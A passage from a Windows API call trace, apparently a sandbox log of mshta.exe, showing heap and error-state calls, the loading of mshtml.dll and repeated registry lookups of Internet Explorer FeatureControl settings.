(dwErrCode=0x0) [0107.899] GetLastError () returned 0x0 [0107.899] SetLastError (dwErrCode=0x0) [0107.899] GetLastError () returned 0x0 [0107.900] SetLastError (dwErrCode=0x0) [0107.900] GetLastError () returned 0x0 [0107.900] SetLastError (dwErrCode=0x0) [0107.900] GetLastError () returned 0x0 [0107.900] SetLastError (dwErrCode=0x0) [0107.900] GetLastError () returned 0x0 [0107.900] SetLastError (dwErrCode=0x0) [0107.900] GetLastError () returned 0x0 [0107.900] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.901] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.901] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.901] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.901] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.901] SetLastError (dwErrCode=0x0) [0107.901] GetLastError () returned 0x0 [0107.902] SetLastError (dwErrCode=0x0) [0107.902] GetLastError () returned 0x0 [0107.902] SetLastError (dwErrCode=0x0) [0107.902] GetLastError () returned 0x0 [0107.902] SetLastError (dwErrCode=0x0) [0107.902] GetLastError () returned 0x0 [0107.902] SetLastError (dwErrCode=0x0) [0107.902] GetLastError () returned 0x0 [0107.902] SetLastError (dwErrCode=0x0) [0107.902] GetLastError () returned 0x0 [0107.903] SetLastError (dwErrCode=0x0) [0107.903] GetLastError () returned 0x0 [0107.903] SetLastError (dwErrCode=0x0) [0107.903] GetLastError () returned 0x0 [0107.903] SetLastError (dwErrCode=0x0) [0107.903] GetLastError () returned 0x0 [0107.903] SetLastError (dwErrCode=0x0) [0107.903] GetLastError () returned 0x0 [0107.904] SetLastError (dwErrCode=0x0) [0107.904] GetLastError () returned 0x0 [0107.904] SetLastError (dwErrCode=0x0) [0107.904] GetLastError () returned 0x0 [0107.904] SetLastError (dwErrCode=0x0) [0107.904] GetLastError () returned 0x0 [0107.904] SetLastError (dwErrCode=0x0) [0107.904] GetLastError () returned 0x0 [0107.904] SetLastError (dwErrCode=0x0) [0107.904] GetLastError () returned 0x0 [0107.905] SetLastError (dwErrCode=0x0) [0107.905] GetLastError () returned 0x0 [0107.905] SetLastError (dwErrCode=0x0) [0107.905] GetLastError () returned 0x0 [0107.905] SetLastError (dwErrCode=0x0) [0107.905] GetLastError () returned 0x0 [0107.905] SetLastError (dwErrCode=0x0) [0107.905] GetLastError () returned 0x0 [0107.905] SetLastError (dwErrCode=0x0) [0107.905] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.906] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.906] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.906] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.906] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.906] GetLastError () returned 0x0 [0107.906] SetLastError (dwErrCode=0x0) [0107.907] GetLastError () returned 0x0 [0107.907] SetLastError (dwErrCode=0x0) [0107.907] GetLastError () returned 0x0 [0107.907] SetLastError (dwErrCode=0x0) [0107.907] GetLastError () returned 0x0 [0107.907] SetLastError (dwErrCode=0x0) [0107.907] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x5fc) returned 0x7217a0 [0107.907] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x720e78 | out: hHeap=0x720000) returned 1 [0107.910] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe12aef) returned 0x0 [0107.911] GetLastError () returned 0x0 [0107.911] SetLastError (dwErrCode=0x0) [0107.911] GetLastError () returned 0x0 [0107.911] SetLastError (dwErrCode=0x0) [0107.911] GetLastError () returned 0x0 [0107.911] SetLastError (dwErrCode=0x0) [0107.911] GetLastError () returned 0x0 [0107.911] SetLastError (dwErrCode=0x0) [0107.911] GetLastError () returned 0x0 [0107.911] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.912] SetLastError (dwErrCode=0x0) [0107.912] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.913] GetLastError () returned 0x0 [0107.913] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.914] GetLastError () returned 0x0 [0107.914] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.915] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.915] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.915] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.915] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.915] SetLastError (dwErrCode=0x0) [0107.915] GetLastError () returned 0x0 [0107.916] SetLastError (dwErrCode=0x0) [0107.916] GetLastError () returned 0x0 [0107.916] SetLastError (dwErrCode=0x0) [0107.916] GetVersion () returned 0x1db10106 [0107.916] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0107.916] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0107.916] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.916] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x105) returned 0x721da8 [0107.916] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x105) returned 0x721eb8 [0107.916] RegOpenKeyExA (in: hKey=0x80000000, lpSubKey="clsid\\{25336920-03f9-11cf-8fd0-00aa00686f13}\\InProcServer32", ulOptions=0x0, samDesired=0x1, phkResult=0x22f714 | out: phkResult=0x22f714*=0x42) returned 0x0 [0107.917] RegQueryValueExA (in: hKey=0x42, lpValueName=0x0, lpReserved=0x0, lpType=0x22f70c, lpData=0x721da8, lpcbData=0x22f708*=0x105 | out: lpType=0x22f70c*=0x1, lpData="C:\\Windows\\SysWOW64\\mshtml.dll", lpcbData=0x22f708*=0x1f) returned 0x0 [0107.918] LoadLibraryA (lpLibFileName="C:\\Windows\\SysWOW64\\mshtml.dll") returned 0x73bd0000 [0109.274] GetProcessHeap () returned 0x450000 [0109.274] GetVersion () returned 0x1db10106 [0109.274] GetModuleHandleW (lpModuleName="Kernel32.dll") returned 0x76d30000 [0109.274] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSetInformation") returned 0x76d45651 [0109.274] HeapSetInformation (HeapHandle=0x450000, HeapInformationClass=0x0, HeapInformation=0x22f3a0, HeapInformationLength=0x4) returned 1 [0109.276] malloc (_Size=0x80) returned 0xf2640 [0109.276] GetVersion () returned 0x1db10106 [0109.277] GetVersionExA (in: lpVersionInformation=0x22f278*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22f278*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0109.278] __dllonexit () returned 0x73df717c [0109.278] __dllonexit () returned 0x73df73bd [0109.278] GetProcessHeap () returned 0x450000 [0109.278] __dllonexit () returned 0x73df7435 [0109.278] __dllonexit () returned 0x73df6e75 [0109.278] __dllonexit () returned 0x73df6ff5 [0109.278] __dllonexit () returned 0x73df71be [0109.278] __dllonexit () returned 0x73df72e2 [0109.278] __dllonexit () returned 0x73df7320 [0109.279] __dllonexit () returned 0x73df7370 [0109.279] __dllonexit () returned 0x73df6e53 [0109.279] __dllonexit () returned 0x73df6e66 [0109.279] __dllonexit () returned 0x73df6a3e [0109.279] __dllonexit () returned 0x73df6a46 [0109.279] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc144 [0109.279] RegisterClipboardFormatW (lpszFormat="CF_RTF") returned 0xc144 [0109.280] __dllonexit () returned 0x73df6a60 [0109.280] __dllonexit () returned 0x73df6a7a [0109.280] __dllonexit () returned 0x73df6a93 [0109.280] __dllonexit () returned 0x73df6aa7 [0109.280] __dllonexit () returned 0x73df6ac1 [0109.280] __dllonexit () returned 0x73df71f1 [0109.280] __dllonexit () returned 0x73df6ad0 [0109.280] __dllonexit () returned 0x73df6adf [0109.281] __dllonexit () returned 0x73df6aee [0109.281] __dllonexit () returned 0x73df6afd [0109.281] __dllonexit () returned 0x73df6b0d [0109.281] __dllonexit () returned 0x73df720c [0109.281] __dllonexit () returned 0x73df6b1c [0109.281] __dllonexit () returned 0x73df6b2f [0109.281] __dllonexit () returned 0x73df6b49 [0109.281] __dllonexit () returned 0x73df6b58 [0109.282] __dllonexit () returned 0x73df6b67 [0109.282] __dllonexit () returned 0x73df6b76 [0109.282] __dllonexit () returned 0x73df6b85 [0109.282] __dllonexit () returned 0x73df6b94 [0109.282] __dllonexit () returned 0x73df6ba3 [0109.282] __dllonexit () returned 0x73df6bb2 [0109.282] __dllonexit () returned 0x73df6bc1 [0109.282] __dllonexit () returned 0x73df6bd0 [0109.283] __dllonexit () returned 0x73df6bdf [0109.283] __dllonexit () returned 0x73df6bee [0109.283] __dllonexit () returned 0x73df6bfd [0109.283] __dllonexit () returned 0x73df6c0c [0109.283] __dllonexit () returned 0x73df6c1b [0109.283] __dllonexit () returned 0x73df6c2a [0109.283] __dllonexit () returned 0x73df6c3d [0109.283] __dllonexit () returned 0x73df6c4c [0109.283] __dllonexit () returned 0x73df6c5b [0109.283] __dllonexit () returned 0x73df6c75 [0109.284] __dllonexit () returned 0x73df6c8f [0109.284] __dllonexit () returned 0x73df6ca9 [0109.284] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0109.284] MulDiv (nNumber=1073741823, nNumerator=384, nDenominator=1440) returned 286331153 [0109.284] __dllonexit () returned 0x73df6cb1 [0109.284] __dllonexit () returned 0x73df7294 [0109.284] __dllonexit () returned 0x73df6ccb [0109.285] __dllonexit () returned 0x73df6cd3 [0109.285] __dllonexit () returned 0x73df6ce2 [0109.285] __dllonexit () returned 0x73df6cf1 [0109.285] __dllonexit () returned 0x73df6d00 [0109.285] __dllonexit () returned 0x73def72d [0109.285] __dllonexit () returned 0x73df6d43 [0109.285] __dllonexit () returned 0x73df6d56 [0109.285] __dllonexit () returned 0x73def095 [0109.285] __dllonexit () returned 0x73df6d65 [0109.286] __dllonexit () returned 0x73df6d78 [0109.286] __dllonexit () returned 0x73df6d87 [0109.286] __dllonexit () returned 0x73df6d9a [0109.286] __dllonexit () returned 0x73df2256 [0109.286] __dllonexit () returned 0x73df679d [0109.286] __dllonexit () returned 0x73df6dd5 [0109.287] __dllonexit () returned 0x73df6df8 [0109.287] __dllonexit () returned 0x73df6e07 [0109.287] __dllonexit () returned 0x73df76cb [0109.287] __dllonexit () returned 0x73df6e1a [0109.287] __dllonexit () returned 0x73df72aa [0109.287] __dllonexit () returned 0x73df72cb [0109.287] __dllonexit () returned 0x73df6e3a [0109.287] GetCurrentThreadId () returned 0xe9c [0109.288] CoCreateGuid (in: pguid=0x7410ad20 | out: pguid=0x7410ad20*(Data1=0x707eeb17, Data2=0x3570, Data3=0x4c4a, Data4=([0]=0xb3, [1]=0xc, [2]=0xfc, [3]=0x56, [4]=0x55, [5]=0x74, [6]=0x3c, [7]=0xd5))) returned 0x0 [0109.290] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x200) returned 0x46e798 [0109.290] __dllonexit () returned 0x73df733d [0109.290] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22ed18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0109.290] PathFindFileNameW (pszPath="C:\\Windows\\SysWOW64\\mshta.exe") returned="mshta.exe" [0109.290] StrCmpICW (pszStr1="mshta.exe", pszStr2="iexplore.exe") returned 4 [0109.290] StrCmpICW (pszStr1="mshta.exe", pszStr2="explorer.exe") returned 8 [0109.290] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x46e9a0 [0109.290] SHRegGetValueW () returned 0x2 [0109.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef64 | out: phkResult=0x22ef64*=0x0) returned 0x2 [0109.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef60 | out: phkResult=0x22ef60*=0x0) returned 0x2 [0109.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.293] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.295] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.295] RegCloseKey (hKey=0x0) returned 0x6 [0109.295] RegCloseKey (hKey=0x0) returned 0x6 [0109.295] RegCloseKey (hKey=0x94) returned 0x0 [0109.295] RegCloseKey (hKey=0x98) returned 0x0 [0109.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.295] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.296] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.296] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.296] RegCloseKey (hKey=0x0) returned 0x6 [0109.296] RegCloseKey (hKey=0x0) returned 0x6 [0109.296] RegCloseKey (hKey=0x98) returned 0x0 [0109.296] RegCloseKey (hKey=0x94) returned 0x0 [0109.296] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.297] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.297] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.297] RegCloseKey (hKey=0x0) returned 0x6 [0109.297] RegCloseKey (hKey=0x0) returned 0x6 [0109.297] RegCloseKey (hKey=0x94) returned 0x0 [0109.297] RegCloseKey (hKey=0x98) returned 0x0 [0109.297] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.297] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.298] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.298] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x9c) returned 0x0 [0109.298] SHRegGetValueW () returned 0x2 [0109.298] SHRegGetValueW () returned 0x2 [0109.298] RegCloseKey (hKey=0x9c) returned 0x0 [0109.298] RegCloseKey (hKey=0x0) returned 0x6 [0109.298] RegCloseKey (hKey=0x0) returned 0x6 [0109.298] RegCloseKey (hKey=0x98) returned 0x0 [0109.298] RegCloseKey (hKey=0x94) returned 0x0 [0109.298] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.298] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.298] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.299] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.299] RegCloseKey (hKey=0x0) returned 0x6 [0109.299] RegCloseKey (hKey=0x0) returned 0x6 [0109.299] RegCloseKey (hKey=0x94) returned 0x0 [0109.299] RegCloseKey (hKey=0x98) returned 0x0 [0109.299] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.299] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.299] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.299] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.299] RegCloseKey (hKey=0x0) returned 0x6 [0109.299] RegCloseKey (hKey=0x0) returned 0x6 [0109.299] RegCloseKey (hKey=0x98) returned 0x0 [0109.300] RegCloseKey (hKey=0x94) returned 0x0 [0109.300] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.300] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.300] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.300] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.300] RegCloseKey (hKey=0x0) returned 0x6 [0109.300] RegCloseKey (hKey=0x0) returned 0x6 [0109.300] RegCloseKey (hKey=0x94) returned 0x0 [0109.300] RegCloseKey (hKey=0x98) returned 0x0 [0109.300] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.301] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.301] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.301] RegCloseKey (hKey=0x0) returned 0x6 [0109.301] RegCloseKey (hKey=0x0) returned 0x6 [0109.301] RegCloseKey (hKey=0x98) returned 0x0 [0109.301] RegCloseKey (hKey=0x94) returned 0x0 [0109.301] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.301] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.301] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.302] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.302] RegCloseKey (hKey=0x0) returned 0x6 [0109.302] RegCloseKey (hKey=0x0) returned 0x6 [0109.302] RegCloseKey (hKey=0x94) returned 0x0 [0109.302] RegCloseKey (hKey=0x98) returned 0x0 [0109.302] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.302] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.302] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.302] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.302] RegCloseKey (hKey=0x0) returned 0x6 [0109.303] RegCloseKey (hKey=0x0) returned 0x6 [0109.303] RegCloseKey (hKey=0x98) returned 0x0 [0109.303] RegCloseKey (hKey=0x94) returned 0x0 [0109.303] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x94) returned 0x0 [0109.303] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x98) returned 0x0 [0109.303] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.303] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.303] RegCloseKey (hKey=0x0) returned 0x6 [0109.303] RegCloseKey (hKey=0x0) returned 0x6 [0109.303] RegCloseKey (hKey=0x94) returned 0x0 [0109.303] RegCloseKey (hKey=0x98) returned 0x0 [0109.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.304] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x94) returned 0x0 [0109.304] RegOpenKeyExW (in: hKey=0x94, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.304] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.304] RegCloseKey (hKey=0x0) returned 0x6 [0109.304] RegCloseKey (hKey=0x0) returned 0x6 [0109.304] RegCloseKey (hKey=0x98) returned 0x0 [0109.304] RegCloseKey (hKey=0x94) returned 0x0 [0109.304] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0109.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef58 | out: phkResult=0x22ef58*=0x98) returned 0x0 [0109.306] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef5c | out: phkResult=0x22ef5c*=0x9c) returned 0x0 [0109.306] RegOpenKeyExW (in: hKey=0x9c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.306] RegOpenKeyExW (in: hKey=0x98, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x22ef18 | out: phkResult=0x22ef18*=0x0) returned 0x2 [0109.306] RegCloseKey (hKey=0x0) returned 0x6 [0109.306] RegCloseKey 